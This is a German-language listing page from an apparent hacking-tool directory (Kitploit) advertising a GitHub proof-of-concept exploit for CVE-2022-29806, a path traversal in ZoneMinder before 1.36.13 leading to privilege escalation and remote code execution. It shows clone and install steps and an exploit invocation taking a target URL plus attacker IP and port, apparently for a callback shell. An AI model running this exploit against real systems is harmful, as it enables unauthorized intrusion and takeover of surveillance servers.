Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-29806 — ZoneMinder bis 1.36.12 Language Privilege Escalation (und RCE) - Poc Exploit | Kitploit
Tools/GitHubGitHub/sigm0n/cve-2022-29806
Privilege EscalationSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-Tool
GitHubsigm0n/cve-2022-29806

CVE-2022-29806

ZoneMinder bis 1.36.12 Language Privilege Escalation (und RCE) - Poc Exploit

Repository anzeigen
3vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2022-29806

ZoneMinder bis 1.36.12 Sprach-Privilegieneskalation (und RCE)

alt img

Beschreibung

Eine Path Traversal-Schwachstelle in der Debug-Protokolldatei und der Standardsprachoption in ZoneMinder-Versionen vor 1.36.13 und 1.37.11 ermöglicht es Angreifern, beliebigen Code zu schreiben und auszuführen, um eine entfernte Befehlsausführung zu erreichen.

"Der Proof of Concept wurde gegen ZoneMinder 1.36.4 ubuntu18.04 Docker: ZoneMinder/zmdockerfiles getestet, ist aber bis zur neuesten Version 1.36.12 anwendbar."

Verwendung

root@kitploit:~
git clone https://github.com/OP3R4T0R/CVE-2022-29806
cd CVE-2022-29806
python3 exploit.py
root@kitploit:~
python3 exploit.py -t <target_url> -ip <attacker_ip> -p <port>
python3 exploit.py -t <target_url> -ip <attacker-ip> -p <port>

Voraussetzungen

root@kitploit:~
pip3 install beautifulsoup4
pip3 install argparse
pip3 install requests

Danksagungen

krastanoel hat die Schwachstelle entdeckt.

Tool herunterladen